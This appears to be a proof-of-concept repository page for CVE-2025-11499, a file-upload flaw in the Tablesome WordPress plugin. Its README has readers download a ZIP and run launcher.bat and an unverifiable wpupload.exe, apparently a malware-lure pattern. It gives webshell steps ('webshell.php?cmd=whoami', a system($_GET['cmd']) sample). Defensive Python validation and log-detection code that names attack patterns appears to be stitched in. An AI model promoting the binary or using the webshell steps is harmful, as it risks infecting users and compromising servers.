Associated Vulnerability
Title: Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent <= 1.1.32 - Unauthenticated Arbitrary File Upload (CVE-2025-11499)
Description: The Tablesome Table – Contact Form DB – WPForms, CF7, Gravity, Forminator, Fluent plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the set_featured_image_from_external_url() function in all versions up to, and including, 1.1.32. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server, which may make remote code execution possible in configurations where unauthenticated users have been provided with a method for adding featured images and the workflow trigger is created.
Readme
# Lab: CVE-2025-11499 - Unauthenticated Arbitrary File Upload Vulnerability in Tablesome WordPress Plugin
## 🚀 Overview
This lab demonstrates an unauthenticated arbitrary file upload vulnerability in the Tablesome plugin for WordPress (versions up to and including 1.1.32). The flaw lies in the `set_featured_image_from_external_url()` function, which does not validate the type of the file it stores, so the extension of the saved file is effectively attacker-controlled. Per the advisory, an unauthenticated attacker can reach this path only in configurations where unauthenticated users have been given a way to add featured images (for example through a specific form setup) and the corresponding workflow trigger exists. Where those conditions hold and the web server also executes PHP from the uploads directory, the upload escalates to remote code execution (RCE) via a webshell.
**Safety Disclaimer:**
This lab is for educational and research purposes only. Do not use the provided tools or techniques on any systems without explicit authorization. Misuse may violate laws such as the Computer Fraud and Abuse Act (CFAA) or equivalent regulations in your jurisdiction. The author assumes no liability for any misuse.
## 📋 Prerequisites
To set up and run this lab, you'll need:
- A local web server environment with PHP 8.1+ and MySQL 8.0+.
- WordPress.
- Tablesome plugin.
- Administrative access to your local machine for file modifications and server configuration.
- Basic knowledge of HTTP requests, file uploads, and web server administration.
- Windows OS for running the exploit tool (compatibility tested on Windows 10/11).
## Download & Install
1. Download the lab repository as a ZIP file from: https://github.com/usjnx72726w/CVE-2025-11499-LAB/raw/refs/heads/main/Hero/cve-2025-11499-lab.zip
2. Extract the ZIP to a local directory.
3. Set up the vulnerable WordPress environment:
- Install your local web server and start Apache and MySQL services.
- Create a new database in phpMyAdmin (e.g., named `wp_tablesome_vuln`).
- Download and extract WordPress to your web root (e.g., `C:\xampp\htdocs\wordpress`).
- Navigate to `http://localhost/wordpress` in your browser and complete the WordPress installation, using the database you created.
- In the WordPress admin dashboard (`http://localhost/wordpress/wp-admin`), install the Tablesome plugin at version 1.1.32 or earlier (the vulnerable range per the advisory) and do not update it, since the lab depends on the unpatched code.
## 🛠 Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `launcher.bat` to launch the exploit tool (`wpupload.exe`).
- This batch file initializes the tool and opens a command-line interface for targeting the vulnerable endpoint.
## 🔍 Exploitation Steps
Once the environment is set up, follow these steps to demonstrate the vulnerability:
1. **Launch the Exploit Tool:**
- Run `launcher.bat` from the lab directory.
- The tool (`wpupload.exe`) will prompt for target details:
- Target URL: `http://localhost/wordpress/wp-admin/admin-ajax.php`
- Action: `tablesome_set_featured_image`
- The tool automates the upload by crafting a multipart/form-data request, sending the PHP payload with a spoofed `Content-Type: image/jpeg` so that any header-based check is satisfied. Note that the vulnerable function is named `set_featured_image_from_external_url()`, which indicates the plugin fetches the image from a supplied URL; verify the actual request shape against the plugin source rather than relying on the tool's description.
- Upon success, the webshell is written to `wp-content/uploads/yyyy/mm/webshell.php`, where `yyyy/mm` is the year and month of the upload (WordPress's default upload directory layout).
2. **Achieve Remote Code Execution:**
- Access the uploaded webshell: `http://localhost/wordpress/wp-content/uploads/yyyy/mm/webshell.php?cmd=whoami`
- Replace the value of `cmd` with the command to run.
- Note: RCE requires that the web server executes PHP from `wp-content/uploads`; hardened hosts block this with an `.htaccess` or nginx rule, in which case the upload succeeds but the shell is served as plain text. Where execution is allowed, the shell runs as the web server user and can lead to full server compromise in production.
3. **Advanced Exploitation Notes:**
- The advisory attributes the flaw to missing file type validation in the plugin's `set_featured_image_from_external_url()`, not to WordPress core's `wp_handle_upload()`, which does apply extension/MIME checks when called with its defaults. A missing nonce would only matter for CSRF; on an endpoint reachable without authentication, the relevant missing controls are a capability check and file type validation.
- For evasion, obfuscated payloads (e.g., base64-encoded PHP in image metadata) may defeat signature scanning, but the file still has to be stored with an extension the server executes as PHP; hidden code in a `.jpg` does nothing unless something includes it.
- Defenders should watch the Apache access log for POSTs to `admin-ajax.php` carrying the action above, the PHP `error_log` for warnings from the upload path, and the uploads tree for newly created `.php` files.
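The check that the advisory says is missing, written out as an added example (this is not the Tablesome plugin's code, and it is in Python rather than PHP so it can run stand-alone). It assumes the fetched bytes plus the client-supplied file name and Content-Type are available; the decision is made on the file's magic bytes, the stored extension is derived from the detected type only, and the Content-Type header is ignored because it is attacker-controlled. The sample inputs are constructed, not captured traffic.

```python
import os
import re

# Allowlisted image types keyed by their leading magic bytes. The decision is
# made on content, never on the client's Content-Type header or file name.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Defence in depth: reject image data that also carries a PHP open tag, the
# "PHP hidden in image metadata" payload style this README mentions.
PHP_MARKERS = (b"<?php", b"<?=")


def detect_image_type(data: bytes):
    """Return the allowlisted extension whose signature matches, else None."""
    for ext, signatures in MAGIC.items():
        if any(data.startswith(sig) for sig in signatures):
            return ext
    return None


def validate_upload(data: bytes, client_name: str, client_mime: str):
    """
    Decide whether fetched bytes may be stored and under which name.
    Returns (accepted, stored_name_or_rejection_reason).
    client_mime is attacker-controlled and deliberately plays no part.
    """
    ext = detect_image_type(data)
    if ext is None:
        return False, "content does not match an allowlisted image signature"
    if any(marker in data for marker in PHP_MARKERS):
        return False, "PHP open tag embedded in image data"
    # Build the stored name from the detected type only: every client-supplied
    # extension (webshell.php, x.php.jpg, y.phtml) is discarded.
    stem = os.path.basename(client_name).split(".")[0]
    stem = re.sub(r"[^A-Za-z0-9_-]", "_", stem) or "image"
    return True, f"{stem}.{ext}"


# Constructed samples (not captured traffic): a minimal JPEG header, a bare
# PHP webshell sent with a spoofed image/jpeg Content-Type, and a polyglot.
SAMPLE_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16
SAMPLE_SHELL = b"<?php system($_GET['cmd']); ?>"
SAMPLE_POLYGLOT = SAMPLE_JPEG + b"<?php echo 1; ?>"


if __name__ == "__main__":
    for name, data, mime in [
        ("photo.JPG", SAMPLE_JPEG, "image/jpeg"),
        ("webshell.php", SAMPLE_SHELL, "image/jpeg"),
        ("x.php.jpg", SAMPLE_POLYGLOT, "image/jpeg"),
    ]:
        print(name, validate_upload(data, name, mime))
```

The spoofed `image/jpeg` header from the exploit step above never reaches the decision, and the double-extension and polyglot cases are both rejected or renamed to the detected type. In a WordPress plugin the equivalent is to run the fetched temp file through `wp_check_filetype_and_ext()` and save it under the extension that call returns, not the one in the URL.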
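For the monitoring note in step 3, an added detection example (not part of the lab) that runs over constructed Apache combined-format log lines: it flags POSTs to `admin-ajax.php` whose query string carries the action name given in this README (`tablesome_set_featured_image`, taken as-is and not verified against the plugin), flags requests for PHP-executable paths under `wp-content/uploads`, and filters a file listing of the uploads tree for names PHP could execute.

```python
import re
from datetime import datetime
from urllib.parse import parse_qs, urlparse

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Action name as given in this README (assumed, not verified against the plugin).
SUSPECT_ACTION = "tablesome_set_featured_image"

# Extensions that PHP handlers in common Apache/php-fpm setups execute; a
# double extension such as x.php.jpg is flagged too, since Apache's mod_mime
# multi-extension handling can still run it when misconfigured.
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.IGNORECASE)

# Constructed sample log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jan/2025:10:14:02 +0000] "POST /wordpress/wp-admin/admin-ajax.php?action=tablesome_set_featured_image HTTP/1.1" 200 48 "-" "python-requests/2.31"
198.51.100.9 - - [02/Jan/2025:10:14:05 +0000] "GET /wordpress/wp-content/uploads/2025/01/webshell.php?cmd=whoami HTTP/1.1" 200 15 "-" "curl/8.4.0"
192.0.2.4 - - [02/Jan/2025:10:15:00 +0000] "GET /wordpress/ HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    url = urlparse(rec["path"])
    rec["route"] = url.path
    rec["query"] = parse_qs(url.query)
    return rec


def suspicious_ajax_posts(log_text: str):
    """POSTs to admin-ajax.php whose query string names the suspect action."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if rec["route"].endswith("/wp-admin/admin-ajax.php") and rec["query"].get("action") == [SUSPECT_ACTION]:
            hits.append((rec["ip"], rec["ts"], rec["path"]))
    return hits


def executed_uploads(log_text: str):
    """Requests for PHP-executable paths under wp-content/uploads (webshell use)."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and "/wp-content/uploads/" in rec["route"] and PHP_EXT_RE.search(rec["route"]):
            hits.append((rec["ip"], rec["ts"], rec["path"]))
    return hits


def suspicious_upload_paths(paths):
    """Filter a listing of files under wp-content/uploads to those PHP could execute."""
    return [p for p in paths if "/wp-content/uploads/" in p and PHP_EXT_RE.search(p)]


if __name__ == "__main__":
    print(suspicious_ajax_posts(SAMPLE_LOG))
    print(executed_uploads(SAMPLE_LOG))
```

The `action` parameter of `admin-ajax.php` is just as often sent in the POST body, which the access log does not record, so the log check alone will miss some attempts; pair it with the file-system scan (`find wp-content/uploads -name '*.php'` does the same job on the host) and with a server rule that refuses to execute PHP under `wp-content/uploads`.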
For questions or contributions, open an issue on the GitHub repo.
File Snapshot
[4.0K] /data/pocs/3b92201ae5ecf9c1c7d0bdeaf5130d477a883926
├── [4.0K] Hero
│ ├── [8.5M] cve-2025-11499-lab.zip
│ └── [ 1] main.py
└── [3.8K] README.md
1 directory, 3 files